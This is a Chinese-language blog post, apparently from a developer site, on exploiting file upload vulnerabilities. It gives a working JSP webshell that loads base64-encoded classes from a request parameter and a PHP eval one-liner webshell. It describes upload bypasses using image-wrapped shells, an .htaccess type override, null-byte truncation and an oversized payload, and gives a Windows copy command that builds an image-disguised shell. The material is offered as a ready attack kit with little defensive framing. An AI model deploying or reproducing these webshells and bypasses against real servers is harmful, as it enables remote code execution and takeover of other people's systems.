文件上传漏洞简述

前提:一句话木马,可用php、jsp、asp等;学会选择小马(什么语言环境写的马就用什么语言的马),工具菜刀、蚁剑(功能全)等

附一个jsp马

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

php马

<?php eval(@$_POST['a']); ?>

1.被上传的环境不存在任何类型的验证

直接上传漏洞,菜刀直接连接即可

2.上传图片马

可以被利用的条件是:能够上传成功;上传后直接访问并能够生成我们的小马.jsp或者.php等

符合上面条件直接上菜刀

3.黑名单绕过

例如上传的类型不可为jsp、php等等脚本语言的类型文件

上传一个内容为jsp小马代码的txt文件,并且上传一个重写文件拓展名的.htaccess文件;

<Directory />
    Options FollowSymLinks
    AllowOverride All
    AddType application/x-httpd-txt .jsp    #将.txt后缀的文件作为jsp文件解析
</Directory>

上传成功后上菜刀,尝试连接

4.00截断

将burpsuite抓包到的上传数据包的文件名改为1.jsp.txt ;将"."hex值 改为00,放包

5.某不知名方法

抓包,将上传的文本内容写的特别长,导致内存溢出..上传成功

补充:制作一句话图片木马

利用windows的copy

copy  phto.jpg/b+muma.php  muma.jpg

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值